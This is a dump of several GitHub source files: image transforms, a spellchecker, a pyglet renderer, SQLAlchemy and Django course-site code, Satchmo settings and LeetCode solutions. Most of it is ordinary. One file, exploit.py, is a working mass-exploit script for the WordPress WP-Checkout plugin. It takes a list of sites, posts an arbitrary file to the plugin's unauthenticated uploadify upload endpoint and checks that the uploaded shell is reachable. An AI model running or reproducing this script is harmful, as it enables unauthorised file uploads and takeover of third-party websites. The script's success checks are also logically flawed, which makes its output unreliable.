{"seq_id":"31129394671","text":"from mmseg.datasets.pipelines.transforms import Resize,RandomCrop,RandomFlip,Normalize,PhotoMetricDistortion,Pad\nimport torchvision.transforms as transforms\nimport torch\nimport numpy as np\nimg_norm_cfg = dict(\n    mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\n\n\nclass ToTensor(object):\n    \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n    def __call__(self, sample):\n        # swap color axis because\n        # numpy image: H x W x C\n        # torch image: C X H X W\n        img = sample['img']\n        mask = sample['gt_semantic_seg']\n        img = np.array(img).astype(np.float32).transpose((2, 0, 1))\n        mask = np.array(mask).astype(np.float32)\n\n        img = torch.from_numpy(img).float()\n        mask = torch.from_numpy(mask).float()\n\n        return {'img': img,\n                'gt_semantic_seg': mask}\n\n\nclass transform_tr(object):\n    def __init__(self,args):\n        self.composed_transforms=transforms.Compose([\n            Resize(img_scale=(2048, 1024), ratio_range=(0.5, 2.0)),\n            RandomCrop(crop_size=args.crop_size,cat_max_ratio=0.75),\n            RandomFlip(prob=0.5),\n            PhotoMetricDistortion(),\n            Normalize(**img_norm_cfg),\n            Pad(size=args.crop_size,pad_val=0,seg_pad_val=255),\n            ToTensor()\n        ])\n    def __call__(self, sample):\n        return self.composed_transforms(sample)\nclass transform_val(object):\n    def __init__(self,args):\n        self.composed_transforms=transforms.Compose([\n            Resize(img_scale=(2048, 1024),keep_ratio=True),\n            # RandomFlip(),\n            Normalize(**img_norm_cfg),\n            ToTensor()\n        ])\n    def __call__(self, sample):\n        return self.composed_transforms(sample)","repo_name":"thanhdh-3030/PT4AL_EXP","sub_path":"dataloaders/mmtransforms.py","file_name":"mmtransforms.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"73882370464","text":"# Install pyspellchecker: pip install pyspellchecker\n\nfrom tqdm import tqdm\nfrom spellchecker import SpellChecker\nfrom nltk.tokenize import 
word_tokenize\nimport argparse\n\nspell = SpellChecker()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--query_file')\nparser.add_argument('--save_to')\nargs = parser.parse_args()\n\nwith open(args.query_file, 'r') as f, \\\n open(args.save_to, 'a+') as wf:\n lines = f.readlines()\n for line in tqdm(lines):\n qid, qry = line.strip().split('\\t')\n words = word_tokenize(qry)\n correct_qry = ''\n for word in words:\n misspelled = spell.unknown([word])\n if len(misspelled) != 0:\n word = spell.correction(word)\n correct_qry += word + \" \"\n wf.write(qid + '\\t' + correct_qry + '\\n')\n\n","repo_name":"ielab/CharacterBERT-DR","sub_path":"data/py_spellchecker.py","file_name":"py_spellchecker.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"7"} +{"seq_id":"38550405220","text":"\"\"\"\nrender tools\n\"\"\"\ntry:\n import pyglet\nexcept ImportError as err:\n raise ImportError('''\n Unable to import pyglet.\n Please install pyglet via 'pip install pyglet'\n ''')\n\ntry:\n from pyglet.gl import *\nexcept ImportError as err:\n raise ImportError('''\n Unable to import gl from pyglet.\n Please install OpenGL.\n ''')\n\nimport math\nimport os\n\nclass Viewer(object):\n def __init__(self, width=640, height=480, caption=\"Robotics Notebook/Path Planning\", icon_file=\"icon.png\"):\n self.width = width\n self.height = height\n platform = pyglet.window.get_platform()\n display = platform.get_default_display()\n # screen = display.get_default_screen()\n config = Config(double_buffer=True)\n self.window = pyglet.window.Window(width=int(width), height=int(height), display=display,\n config=config, caption=caption)\n icon = pyglet.image.load(os.path.dirname(__file__) + '/' + icon_file)\n self.window.set_icon(icon)\n self.is_open = True\n self.window.on_close = self.close_viewer\n self.window.on_draw = self.draw\n self.geoms = []\n\n def render(self):\n glClearColor(1,1,1,1)\n self.window.clear()\n self.window.switch_to()\n self.window.dispatch_events()\n self.window.dispatch_event('on_draw')\n self.window.flip()\n\n def add_geometry(self, type, **attrs):\n if type == 'point':\n self.geoms.append(Point(**attrs))\n elif type == 'line':\n self.geoms.append(Line(**attrs))\n\n def draw(self):\n self.draw_point(pos=(400, 300), color=(100, 0, 0), pointSize=3)\n self.draw_line(start=(200, 200), end=(400, 400), color=(0, 100, 0), lineWidth=3)\n self.draw_circle(pos=(100,350), radius=50, res=50, color=(100, 100, 0))\n self.draw_circle(pos=(100, 50), radius=30, res=10, filled=False, lineWidth=5)\n self.draw_polygon(points=((200, 50), (200, 250), (400, 250), (400, 50)), close=True, lineWidth=3, color=(0, 0, 100))\n self.draw_polygon(points=((500, 250), (500, 350), (600, 350), (600, 250)), filled=True, color=(0, 0, 100))\n\n def draw_point(self, pos, **attrs):\n point = Point(pos=pos)\n if 'color' in attrs:\n point.set_color(*attrs['color'])\n if 'pointSize' in attrs:\n point.set_pointSize(attrs['pointSize'])\n point.render()\n\n def draw_line(self, start, end, **attrs):\n line = Line(start=start, end=end)\n if 'color' in attrs:\n line.set_color(*attrs['color'])\n if 'lineWidth' in attrs:\n line.set_lineWidth(attrs['lineWidth'])\n line.render()\n\n def draw_circle(self, pos, radius, **attrs):\n circle = Circle(pos=pos, radius=radius)\n if 'color' in attrs:\n circle.set_color(*attrs['color'])\n if 'res' in attrs:\n circle.set_res(attrs['res'])\n if 'filled' in attrs:\n circle.set_filled(attrs['filled'])\n if 'lineWidth' 
in attrs:\n            circle.set_lineWidth(attrs['lineWidth'])\n        circle.render()\n\n    def draw_polygon(self, points, **attrs):\n        polygon = Polygon(points=points)\n        if 'color' in attrs:\n            polygon.set_color(*attrs['color'])\n        if 'close' in attrs:\n            polygon.set_close(attrs['close'])\n        if 'filled' in attrs:\n            polygon.set_filled(attrs['filled'])\n        if 'lineWidth' in attrs:\n            polygon.set_lineWidth(attrs['lineWidth'])\n        polygon.render()\n\n    def close_viewer(self):\n        self.is_open = False\n\n\nclass Attr(object):\n    def enable(self):\n        raise NotImplementedError\n    def disable(self):\n        pass\n\nclass Color(Attr):\n    def __init__(self, *color):\n        self.color = color\n    def enable(self):\n        glColor3b(*self.color)\n\nclass LineWidth(Attr):\n    def __init__(self, width):\n        self.width = width\n    def enable(self):\n        glLineWidth(self.width)\n\nclass PointSize(Attr):\n    def __init__(self, size):\n        self.size = size\n    def enable(self):\n        glPointSize(self.size)\n\nclass Geom(object):\n    def __init__(self):\n        self._color = Color(0, 0, 0)\n        self.attrs = [self._color]\n    def render(self):\n        for attr in self.attrs:\n            attr.enable()\n        self.render1()\n        for attr in self.attrs:\n            attr.disable()\n    def render1(self):\n        raise NotImplementedError\n    def add_attr(self, attr):\n        self.attrs.append(attr)\n    def set_color(self, r, g, b):\n        self._color.color = (r, g, b)\n\nclass Point(Geom):\n    def __init__(self, pos=(0,0), size=3, color=None):\n        Geom.__init__(self)\n        self._pos = pos\n        self._pointSize = PointSize(size=size)\n        self.add_attr(self._pointSize)\n        if color is not None:\n            self.set_color(*color)\n    def render1(self):\n        glBegin(GL_POINTS)\n        glVertex2d(*self._pos)\n        glEnd()\n    def set_pointSize(self, size):\n        self._pointSize.size = size\n\nclass Line(Geom):\n    def __init__(self, start, end, width=3, color=None):\n        Geom.__init__(self)\n        self._start = start\n        self._end = end\n        self._lineWidth = LineWidth(width=width)\n        self.add_attr(self._lineWidth)\n        if color is not None:\n            self.set_color(*color)\n    def render1(self):\n        glBegin(GL_LINES)\n        glVertex2d(*self._start)\n        glVertex2d(*self._end)\n        glEnd()\n    def set_lineWidth(self, width):\n        self._lineWidth.width = width\n\nclass Circle(Geom):\n    def __init__(self, pos, radius, res=30, filled=True, width=3, color=None):\n        Geom.__init__(self)\n        self._pos = pos\n        self._radius = radius\n        self._res = res\n        self._filled = filled\n        self._lineWidth = LineWidth(width=width)\n        # register the width attribute so set_lineWidth actually affects rendering\n        self.add_attr(self._lineWidth)\n        if color is not None:\n            self.set_color(*color)\n    def render1(self):\n        if self._filled:\n            glBegin(GL_POLYGON)\n        else:\n            glBegin(GL_LINE_LOOP)\n        for i in range(max(self._res, 5)):\n            angle = 2*math.pi/self._res*i\n            glVertex2d(self._pos[0] + self._radius * math.cos(angle), self._pos[1] + self._radius * math.sin(angle))\n        glEnd()\n    def set_pos(self, pos):\n        self._pos = pos\n    def set_radius(self, radius):\n        self._radius = radius\n    def set_res(self, res):\n        self._res = res\n    def set_filled(self, filled):\n        self._filled = filled\n    def set_lineWidth(self, width):\n        self._lineWidth.width = width\n\nclass Polygon(Geom):\n    def __init__(self, points, close=True, filled=False, width=3, color=None):\n        Geom.__init__(self)\n        self._points = points\n        self._close = close\n        self._filled = filled\n        self._lineWidth = LineWidth(width=width)\n        self.add_attr(self._lineWidth)\n        if color is not None:\n            self.set_color(*color)\n    def render1(self):\n        if self._filled:\n            if len(self._points) > 4:\n                glBegin(GL_POLYGON)\n            elif len(self._points) == 4:\n                glBegin(GL_QUADS)\n            else:\n                glBegin(GL_TRIANGLES)\n        else:\n            glBegin(GL_LINE_LOOP if self._close else GL_LINE_STRIP)\n        for point in 
\n\nif __name__ == '__main__':\n    viewer = Viewer()\n    while viewer.is_open:\n        viewer.render()","repo_name":"0aqz0/Robotics-Notebook","sub_path":"PathPlanning/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"7"}
{"seq_id":"9920571277","text":"from sqlalchemy.orm import Session\nfrom sqlalchemy.exc import IntegrityError\nfrom models import Student\nfrom random import randint\n\n\ndef insert_student(db: Session, student: Student):\n    while True:\n        try:\n            student_id = randint(10000000, 99999999)\n            student.studentId = student_id\n            db.add(student)\n            db.flush()\n            db.commit()\n            return student\n        except IntegrityError:\n            # roll the failed transaction back before retrying with a fresh random id;\n            # without this the session stays in an aborted state and every retry fails\n            db.rollback()\n\n\ndef get_students(db: Session, order_by: str = None):\n    students = db.query(Student)\n    if order_by in {\"last_name\", \"age\", \"grade\"}:\n        if order_by == \"last_name\":\n            students = students.order_by(Student.lastName.asc())\n        elif order_by == \"age\":\n            students = students.order_by(Student.dateOfBirth.desc())\n        elif order_by == \"grade\":\n            students = students.order_by(Student.schoolGrade.desc())\n    return students.all()\n\n\ndef get_student(db: Session, student_id: int):\n    return db.query(Student).filter_by(studentId=student_id).first()\n\n\ndef delete_student(db: Session, student_id: int = -1, student: Student = None):\n    if student_id > 0:\n        raise NotImplementedError(\"For now deletion by id is not supported yet\")\n    elif not student:\n        raise ValueError(\"Student object is required\")\n    db.delete(student)\n    db.flush()\n    db.commit()\n\n\ndef delete_students(db: Session):\n    db.query(Student).delete()\n    db.flush()\n    db.commit()\n\n\ndef count_students(db):\n    return db.query(Student).count()\n","repo_name":"sergey-misuk-work/students","sub_path":"app/services/students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"44432956401","text":"# This file is used to store your site specific settings\n# for database access.\n# It also stores satchmo unique information\n#\n#\n# Modify this file to reflect your settings, then rename it to \n# local_settings.py\n#\n# This file is helpful if you have an existing Django project. 
\n# These are specific things that Satchmo will need.\n# you MUST make sure these settings are imported from your project settings file!\n\nimport os\nimport logging\nDIRNAME = os.path.dirname(__file__)\n\n# This is useful, since satchmo is not the \"current directory\" like load_data expects.\n# SATCHMO_DIRNAME = ''\n\n# Only set these if Satchmo is part of another Django project\n#SITE_NAME = ''\n#ROOT_URLCONF = ''\n#MEDIA_ROOT = os.path.join(DIRNAME, 'static/')\n#DJANGO_PROJECT = 'Your Main Project Name'\n#DJANGO_SETTINGS_MODULE = 'main-project.settings'\n\n# Make sure Satchmo templates are added to your existing templates\n# TEMPLATE_DIRS += (\n# os.path.join(SATCHMO_DIRNAME, \"templates\"),\n#)\n\n# Make sure Satchmo context processor is called\n# TEMPLATE_CONTEXT_PROCESSORS += ('satchmo.shop.context_processors.settings')\n\nDATABASE_NAME = ''\nDATABASE_PASSWORD = ''\nDATABASE_USER = ''\nSECRET_KEY = ''\n\n##### For Email ########\n# If this isn't set in your settings file, you can set these here\n#EMAIL_HOST = 'host here'\n#EMAIL_PORT = 587\n#EMAIL_HOST_USER = 'your user here'\n#EMAIL_HOST_PASSWORD = 'your password'\n#EMAIL_USE_TLS = True\n\n#### Satchmo unique variables ####\n#This is the base url for the shop. Only include a leading slash\n#examples: '/shop' or '/mystore'\n#If you want the shop at the root directory, set SHOP_BASE = ''\nSHOP_BASE = '/shop'\n\n#These are used when loading the test data\nSITE_DOMAIN = \"example.com\"\nSITE_NAME = \"My Site\"\n\n# These can override or add to the default URLs\nfrom django.conf.urls.defaults import *\nURLS = patterns('',\n)\nSHOP_URLS = patterns('satchmo.shop.views',\n# (r'^checkout/pay/$', 'paypal.checkout_step2.pay_ship_info', {'SSL': False}, 'satchmo_checkout-step2'),\n# (r'^checkout/confirm/$', 'paypal.checkout_step3.confirm_info', {'SSL': False}, 'satchmo_checkout-step3'),\n)\n\n# register custom external newsletter modules by listing their modules here\n# ex: CUSTOM_NEWSLETTER_MODULES = ['client.newsletter.autoresponder',]\nCUSTOM_NEWSLETTER_MODULES = []\n\n# register custom external payment modules by listing their modules here\n# ex: CUSTOM_NEWSLETTER_MODULES = ['client.payment.wondercharge',]\nCUSTOM_PAYMENT_MODULES = []\n\n# register custom external shipping modules by listing their modules here\n# ex: CUSTOM_NEWSLETTER_MODULES = ['client.shipping.fancyshipping',]\nCUSTOM_SHIPPING_MODULES = []\n\n# register custom external product modules by listing their modules here\n# ex: CUSTOM_NEWSLETTER_MODULES = ['client.product.myproducttype',]\nCUSTOM_PRODUCT_MODULES = []\n\n# a cache backend is required. Do not use locmem, it will not work properly at all in production\n# Preferably use memcached, but file or DB is OK. File is faster, I don't know why you'd want to use\n# db, personally. See: http://www.djangoproject.com/documentation/cache/ for help setting up your\n# cache backend\n#CACHE_BACKEND = \"memcached://127.0.0.1:11211/\"\nCACHE_BACKEND = \"file:///var/tmp/django_cache\"\nCACHE_TIMEOUT = 60*5\n\n# Locale path settings. 
Needs to be set for Translation compilation.\n# It can be blank\n# LOCALE_PATHS = \"\"\n\n#Configure logging\nLOGDIR = DIRNAME\nLOGFILE = \"satchmo.log\"\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename=os.path.join(LOGDIR, LOGFILE),\n filemode='w')\n\n# define a Handler which writes INFO messages or higher to the sys.stderr\nfileLog = logging.FileHandler(os.path.join(LOGDIR, LOGFILE), 'w')\nfileLog.setLevel(logging.DEBUG)\n# set a format which is simpler for console use\nformatter = logging.Formatter('%(asctime)s %(name)-12s: %(levelname)-8s %(message)s')\n# tell the handler to use this format\nfileLog.setFormatter(formatter)\n# add the handler to the root logger\nlogging.getLogger('').addHandler(fileLog)\nlogging.getLogger('caching').setLevel(logging.INFO)\nlogging.info(\"Satchmo Started\")\n","repo_name":"davemerwin/satchmo","sub_path":"satchmo-0.6.0/satchmo/local_settings-customize.py","file_name":"local_settings-customize.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"17180448040","text":"from typing import List\r\n\r\n\r\nclass Solution:\r\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\r\n self._candidates = candidates\r\n self._len = len(candidates)\r\n self.ret = []\r\n self.recursion(0, target, [])\r\n return self.ret\r\n\r\n def recursion(self, start, left, current_list):\r\n if start >= self._len:\r\n return\r\n self.recursion(start + 1, left, current_list[:]) # 该位置不取\r\n current_val = self._candidates[start]\r\n left = left - current_val\r\n while left > 0:\r\n current_list.append(current_val)\r\n self.recursion(start + 1, left, current_list[:]) # 该位置分别取1~多次, 再进入下个位置, 即DFS\r\n left = left - current_val\r\n if left == 0:\r\n current_list.append(current_val)\r\n self.ret.append(current_list)\r\n\r\n\r\ndef test():\r\n def assert_equal_list(l1: List[List[int]], l2: List[List[int]]):\r\n print(f'l1={l1}\\nl2={l2}')\r\n assert len(l1) == len(l2)\r\n assert set(tuple(e) for e in l1) == set(tuple(e) for e in l2)\r\n print()\r\n\r\n s = Solution()\r\n\r\n candidates = [2, 3, 6, 7]\r\n target = 7\r\n expected = [\r\n [7],\r\n [2, 2, 3]\r\n ]\r\n assert_equal_list(s.combinationSum(candidates, target), expected)\r\n\r\n candidates = [2, 3, 5]\r\n target = 8\r\n expected = [\r\n [2, 2, 2, 2],\r\n [2, 3, 3],\r\n [3, 5]\r\n ]\r\n assert_equal_list(s.combinationSum(candidates, target), expected)\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n","repo_name":"miniyk2012/leetcode","sub_path":"leetcode_projects/leetcode_39/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"512866471","text":"# Filedata\nimport colorama # pip3 install colorama\nfrom colorama import Fore as F\nimport requests as r # pip3 install requests\nimport argparse as arg\nimport os as sistema\nimport sys\nsistema.system('cls' if sistema.name == 'nt' else 'reset')\n\ndef arruma(url):\n\tif url[-1] != \"/\":\n\t\turl = url + \"/\"\n\tif url[:7] != \"http://\" and url[:8] != \"https://\":\n\t\turl = \"http://\" + url\n\treturn url\nuser_agent = {'User-agent': 'Mozilla/5.0'}\n\nindex = r\"\"\"{}\n:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::{}\n__ __ _ _____ \n\\ \\ / / | | / ____| \n \\ \\_/ / _ _ __ | | _____ _ __ ___| | _ 
__ _____ __\n \\ / | | | '_ \\| |/ / _ \\ '__/ __| | | '__/ _ \\ \\ /\\ / /\n | || |_| | | | | < __/ | \\__ \\ |____| | | __/\\ V V / \n |_| \\__,_|_| |_|_|\\_\\___|_| |___/\\_____|_| \\___| \\_/\\_/ \n {}Wordpress Plugin \"WP-Checkout\" mass exploit \n\n{}Autor: {}Supr3m0 (Yunkers Crew)\n{}Github: {}www.github.com/2inf3rnal/\n{}Skype: {}inf3rnal.king\n:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\"\"\".format(F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE)\n\nmanual = \"\"\"{}--lista {}Lista com os sites.\n{}--arquivo {}Arquivo que será upado no site.\n{}--threads {}Quantidade de requisições (Default = 10)\n\n{}Use: {}python3 {} --lista --arquivo --threads 5\"\"\".format(F.CYAN, F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE, sys.argv[0])\n\nif len(sys.argv) == 1:\n\tprint(index)\n\tprint(manual)\n\texit()\n\nparser = arg.ArgumentParser(description = \"By Supr3m0\")\nparser.add_argument(\"--lista\", \"-l\", action='store')\nparser.add_argument(\"--arquivo\", \"-a\", action='store')\nparser.add_argument(\"--threads\", \"-t\", action='store', type = int, default = 10)\nparam = parser.parse_args()\n\nif not param.lista:\n\tprint(\"{}[-] {}Insira a lista com os devidos sites!\".format(F.RED, F.WHITE))\n\texit()\nif not param.arquivo:\n\tprint(\"{}[-] {}Insira o arquivo que será upado no site!\".format(F.RED, F.WHITE))\n\texit()\n\nprint(index)\nprint(\"{}[+] {}Lista de sites: {}\".format(F.CYAN, F.WHITE, param.lista))\nprint(\"{}[+] {}Arquivo que será upado: {}\".format(F.CYAN, F.WHITE, param.arquivo))\nprint(\"\\n{}[...] {}Lendo lista de sites...\".format(F.CYAN, F.WHITE))\n\ntry:\n\tlista = open(param.lista, \"r\")\n\tlista = lista.readlines()\n\tlista = [site.replace(\"\\n\", \"\") for site in lista]\n\tarquivo = open(param.arquivo, \"rb\")\nexcept Exception as err:\n\tprint(\"{}[-] {}Algum erro aconteceu ao tentar abrir os arquivos {} / {}\".format(F.CYAN, F.WHITE, param.lista, param.arquivo))\n\texit()\n\nprint(\"{}[+] {}Total de sites: {}\".format(F.CYAN, F.WHITE, str(len(lista))))\nprint(\"\\n{}[...] {}Iniciando exploração em massa!\".format(F.CYAN, F.WHITE))\n\npayload = {\"Filedata\" : arquivo}\ntry:\n\tfor site in lista:\n\t\turl = arruma(site) + \"wp-content/plugins/wp-checkout/vendors/uploadify/upload.php\"\n\t\tcheca = r.get(url)\n\t\tif checa.status_code != 404 and not \"404\" or \"not found\" or \"internal\" or \"500\" or \"403\" in checa.text:\n\t\t\tprint(\"{}\\n[!] {}O site {} pode está vulnerável!\".format(F.GREEN, F.WHITE, site))\n\t\t\tprint(\"{} [...] {}Inserindo payload...\".format(F.GREEN, F.WHITE))\n\t\t\tenvia = r.post(url, files=payload)\n\t\t\tif not \"404\" or \"not found\" or \"internal\" or \"500\" or \"403\" in envia.text:\n\t\t\t\tprint(\"{} [...] {}Payload enviado com sucesso, verificando se o arquivo foi realmente upado...\".format(F.GREEN, F.WHITE))\n\t\t\t\tshell = arruma(site) + \"wp-content/uploads/wp-checkout/uploadify/\" + envia.text\n\t\t\t\tshell = r.get(shell)\n\t\t\t\tif shell.status_code == 200:\n\t\t\t\t\tprint(\"{} [+] {}Arquivo enviada com sucesso: {}\\n\".format(F.GREEN, F.WHITE, arruma(site) + \"wp-content/uploads/wp-checkout/uploadify/\" + envia.text))\n\t\t\t\telse:\n\t\t\t\t\tprint(\"{} [-] {}Não encontrei a shell.. 
-> {}\\n\".format(F.RED, F.WHITE,arruma(site) + \"wp-content/uploads/wp-checkout/uploadify/\" + envia.text))\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint(\"{} [-] {}Erro ao enviar o payload...\\n\".format(F.RED, F.WHITE))\n\t\t\t\tcontinue\n\t\telse:\n\t\t\tcontinue\nexcept KeyboardInterrupt:\n\texit(\"bye\")\nprint(\"\\n{}[FINISH]{}\".format(F.CYAN, F.WHITE))\n","repo_name":"2inf3rnal/wp-checkout-exploit","sub_path":"exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"pt","doc_type":"code","stars":16,"dataset":"github-code","pt":"7"} +{"seq_id":"72685381984","text":"from Naive338 import Solution as Naive\nfrom Naive2_338 import Solution as Naive2\n\ntestcases = [\n (2, [0, 1, 1]),\n (5, [0, 1, 1, 2, 1, 2]),\n]\n\n\ndef test_naive():\n for n, ans in testcases:\n assert Naive().countBits(n) == ans\n\ndef test_naive2():\n for n, ans in testcases:\n assert Naive2().countBits(n) == ans\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/BitManipulation/CountingBits/test_338.py","file_name":"test_338.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"26934396108","text":"import json\nimport time\nimport traceback\n\nfrom django.core.paginator import Paginator, PageNotAnInteger, InvalidPage\n\nfrom django.db import transaction\nfrom django.http import JsonResponse\nfrom django.shortcuts import render,HttpResponse\n\n\nfrom courseapp.models import TCategory\nfrom courseapp.models import Title\n\n# Create your views here.\n\n#渲染主界面\ndef home(request):\n username = request.session.get('username')\n title = Title.objects.all()\n course = TCategory.objects.filter(level=1)\n course_type = TCategory.objects.filter(level=2)\n num = int(request.GET.get('num', 1))\n pagtor = Paginator(title, per_page=5)\n if num < 1:\n num = 1\n elif num > pagtor.num_pages:#最后一页\n num = pagtor.num_pages\n num = str(num)\n page = pagtor.page(num)\n return render(request,'courseapp/index.html',{'username':username,'page':page,'titles':title,'course':course,'course_type':course_type})\n\n\n\ndef home1(request):\n username = request.session.get('username')\n id = request.GET.get('id')\n level = request.GET.get('level')\n course_type = TCategory.objects.filter(level=2)\n course = TCategory.objects.filter(level=1)\n list = []\n list1 = []\n if level =='2':\n id = int(id)\n data = TCategory.objects.filter(id=id)\n for i in data:\n list.append(i)\n pt = Title.objects.filter(cate__id=i.id) # 查文章对象\n for i in pt:\n list1.append(i)\n else:\n id = int(id)\n data = TCategory.objects.filter(parnt_elevel=id)\n for i in data:\n list.append(i)\n pt = Title.objects.filter(cate__id=i.id) # 查文章对象\n for i in pt:\n list1.append(i)\n\n num = int(request.GET.get('num', 1))\n pagtor = Paginator(list1, per_page=5)\n if num < 1:\n num = 1\n elif num > pagtor.num_pages:\n num = pagtor.num_pages\n page = pagtor.page(num)\n return render(request, 'courseapp/pythonBase.html', {'username':username,'id': id,'page': page,'level': level,\n 'list1': list1,'list': list,'course':course,'course_type':course_type })\n\n\ndef course_add(request):\n course = TCategory.objects.filter(level=1)\n course_type = TCategory.objects.filter(level=2)\n return render(request,'courseapp/addCourse.html',{'course':course,'course_type':course_type})\n\n#添加课程/课程分类\ndef course_add1(request):\n title = request.POST.get('name')\n level = request.POST.get('title')\n cate_sel = request.POST.get('cate_sel') 
# the selected course category name\n    try:\n        level = int(level)\n        # add a course sub-category\n        if level == 2:\n            u = TCategory.objects.filter(titles=cate_sel)\n            with transaction.atomic():\n                category = TCategory(titles=title, level=level, parnt_elevel=u[0].id)\n                category.save()\n            data = TCategory.objects.get(titles=title)\n            return HttpResponse('添加成功!'+str(data.id)+\"!\"+str(level))\n        else:\n            # add a top-level course\n            with transaction.atomic():\n                category = TCategory(titles=title, level=level)\n                category.save()\n            data = TCategory.objects.get(titles=title)\n            return HttpResponse('添加成功!'+str(data.id)+\"!\"+str(level))\n    except:\n        traceback.print_exc()\n        return HttpResponse('添加失败!')\n\n# render the add-article page\ndef course_add_title(request):\n    course = TCategory.objects.filter(level=1)\n    course_type = TCategory.objects.filter(level=2)\n    return render(request, 'courseapp/addArticle.html', {'course': course, 'course_type': course_type})\n\n\ndef my_default(t):\n    if isinstance(t, Title):\n        return {'id': t.id, 'title': t.title, 'content': t.content, 'publish_time': t.publish_time.strftime('%Y-%m-%d %H-%M-%S'),'count':t.count,'cate_id':t.cate_id}\n    if isinstance(t, TCategory):\n        return {'id': t.id, 'titles': t.titles, 'level': t.level, 'parnt_elevel': t.parnt_elevel}\n\n# query the second-level categories and return them as a JSON object\ndef addAritcle(request):\n    course_id = request.POST.get(\"course\")\n    course = TCategory.objects.filter(parnt_elevel=course_id)\n    if course:\n        return JsonResponse({\"course\":list(course)},json_dumps_params={\"default\":my_default})\n    return HttpResponse('error!')\n\n# logic for adding an article\ndef addAritcle_btn(request):\n    title = request.POST.get(\"title\")\n    # course_sel = request.POST.get(\"course_sel\")  # parent course\n    cate_sel = request.POST.get(\"cate_sel\")  # parent course category\n    id = TCategory.objects.filter(titles=cate_sel)\n    publish_time = request.POST.get(\"time\")\n    txt = request.POST.get(\"txt\")\n    try:\n        if not publish_time:\n            publish_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n        t = Title(title=title,content=txt,count=0,publish_time=publish_time,cate_id=id[0].id)\n        t.save()\n        data = Title.objects.filter(cate_id=id[0].id)\n        if len(data) < 5:\n            num = 1\n        else:\n            if len(data) % 5 == 0:  # was '// 5 == 0', which is never true for a non-empty queryset\n                num = int(len(data) / 5)\n            else:\n                num = int(len(data) / 5) + 1\n        return HttpResponse(\"添加成功!\"+str(id[0].id)+\"!\"+str(id[0].level)+\"!\"+str(num))\n    except:\n        traceback.print_exc()\n        return HttpResponse(\"添加失败!\")\n\n# delete an article\ndef delete(request):\n    del_id = request.POST.get(\"del_id\")\n    id = request.POST.get(\"id\")\n    level = request.POST.get(\"level\")\n    num = request.POST.get(\"num\")\n    title = Title.objects.filter(id=del_id)\n    title.delete()\n    if id and level:\n        return HttpResponse(\"删除成功!\" + num+\"!\"+ id+\"!\"+ level)\n    return HttpResponse(\"删除成功!\" + num)\n\n# show the update form for an article\ndef update(request):\n    id = request.GET.get('id')\n    if isinstance(id, str):\n        id = int(id)\n    request.session['id'] = id\n    data = Title.objects.get(id=id)  # the article\n    data1 = TCategory.objects.get(id=data.cate_id)  # the article's second-level category\n    data2 = TCategory.objects.get(id=data1.parnt_elevel)  # the article's top-level category\n    course = TCategory.objects.filter(level=1)\n    course_type = TCategory.objects.filter(level=2)\n    return render(request, 'courseapp/update.html', {'data1': data1,'data2': data2,'course': course, 'course_type': course_type,'data':data})\n
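# --- Added sketch (not part of the original views.py): the manual page clamping in ---
# home()/home1() above reimplements what Django's Paginator already offers. On
# Django >= 2.0, Paginator.get_page() handles non-integer and out-of-range page
# numbers itself; 'paginated' is a hypothetical helper, and Paginator is already
# imported at the top of this file:
def paginated(objects, num, per_page=5):
    paginator = Paginator(objects, per_page)
    return paginator.get_page(num)  # non-integer num -> page 1, too-large num -> last page

# usage sketch: page = paginated(Title.objects.all(), request.GET.get('num', 1))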
\n# logic for updating an article\ndef updata_title(request):\n    id = request.session.get('id')\n    title = request.POST.get(\"title\")\n    cate_sel = request.POST.get(\"cate_sel\")  # parent course category\n    t_id = TCategory.objects.filter(titles=cate_sel)\n    publish_time = request.POST.get(\"time\")\n    txt = request.POST.get(\"txt\")\n    t = Title.objects.get(id=id)\n    try:\n        if not publish_time:\n            publish_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n        t.title = title\n        t.content = txt\n        t.publish_time = publish_time\n        t.cate_id = t_id[0].id\n        t.save()\n        data = Title.objects.filter(cate_id=t_id[0].id)\n        if len(data) < 5:\n            num = 1\n        else:\n            if len(data) % 5 == 0:  # was '// 5 == 0', same typo as in addAritcle_btn above\n                num = int(len(data) / 5)\n            else:\n                num = int(len(data) / 5) + 1\n        return HttpResponse(\"添加成功!\" + str(t_id[0].id) + \"!\" + str(t_id[0].level) + \"!\" + str(num))\n    except:\n        traceback.print_exc()\n        return HttpResponse(\"添加失败!\")\n\n# sorted listings\ndef read_sort(request):\n    id = request.GET.get('id')\n    level = request.GET.get('level')\n    read = request.GET.get('read')\n    time = request.GET.get('time')\n    list1 = []\n    if level == '2':\n        